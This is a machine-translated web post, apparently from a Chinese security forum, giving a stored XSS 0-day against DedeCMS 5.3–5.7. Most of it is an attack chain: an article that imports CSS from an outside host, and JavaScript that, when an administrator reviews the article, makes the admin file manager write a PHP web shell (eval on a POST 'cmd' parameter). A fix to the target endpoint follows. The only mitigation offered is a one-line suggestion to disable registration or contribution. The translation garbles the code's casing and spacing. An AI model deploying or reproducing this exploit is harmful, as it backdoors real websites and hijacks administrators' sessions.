DeDecms xss kill 0-day and Solution

Author: haris

Vulnerability cause: malicious scripts run due to lax filtering of the Editor

Only versions 5.3 to 5.7 have been tested. You can use other earlier versions as needed.

 

The following describes how to use it.
There are three conditions:
1. enable registration
2. Enable contribution

3. The Administrator is very hardworking and will review the article.

Registering a member-publishing an article

Content:

<Style> @ import 'HTTP: // www.bkjia.com.com/xss.css'; </style>

 

Create XSS. CXX
Body {
Background-image: url (javascript: document. write (""))
}

 

Create xss. js

Content

Var request = false;
If (window. XMLHttpRequest ){
Request = new XMLHttpRequest ();
If (request. overrideMimeType ){
Request. overrideMimeType (text/xml );
}
} Else if (window. ActiveXObject ){
Var versions = [Microsoft. XMLHTTP, MSXML. XMLHTTP, Microsoft. XMLHTTP, Msxml2.XMLHTTP. 7.0, Msxml2.XMLHTTP. 6.0, Msxml2.XMLHTTP. 5.0, Msxml2.XMLHTTP. 4.0, MSXML2.XMLHTTP. 3.0, MSXML2.XMLHTTP];
For (var I = 0; I try {
Request = new ActiveXObject (versions [I]);
} Catch (e ){}
}
}
Xmlhttp = request;
Function getFolder (url ){
Obj = url. split (/)
Return obj [obj. length-2]
}
OUrl = top. location. href;
U = getFolder (oUrl );
Add_admin ();
Function add_admin (){
Var url = "/" + u + "/sys_ SQL _query.php ";
Var params = "fmdo = edit & backurl = & activepath = % 2 Fdata & filename = haris. php & str = % 3C % 3 Fphp + eval % 28% 24_POST % 5 Bcmd % 5D % 29% 3F % 3E & B1 = ++ % E4 % BF % 9D + % E5 % AD % 98 ++ ";
Xmlhttp. open ("POST", url, true );
Xmlhttp. setRequestHeader ("Content-type", "application/x-www-form-urlencoded ");
Xmlhttp. setRequestHeader ("Content-length", params. length );
Xmlhttp. setRequestHeader ("Connection", "Keep-Alive ");
Xmlhttp. send (params );
}

When the Administrator reviews this article, a statement haris. php is automatically generated in the data directory. Password cmd
 

T00ls

Some students say that they are not successful. I have just read the code and need to correct it.

Modify sys_ SQL _query.php to file_manage_control.php.

The domain does not exist.

 

Fix: Check the condition of use. We recommend that you temporarily disable registration or contribution, or suspend review of articles, waiting for official patches.

There are three conditions:
1. enable registration
2. Open contribution 3. The Administrator is very hardworking and will review the article.

Registering a member-publishing an article